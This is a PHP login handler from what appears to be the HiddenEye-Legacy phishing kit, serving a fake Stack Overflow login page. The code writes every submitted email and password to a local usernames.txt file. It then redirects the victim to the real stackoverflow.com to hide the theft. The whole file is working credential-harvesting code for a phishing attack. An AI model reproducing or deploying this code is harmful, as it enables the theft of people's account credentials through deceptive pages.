HiddenEye-Legacy/WebPages/stackoverflow/login.php

8 lines
202 B
PHP

<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://stackoverflow.com/');
exit();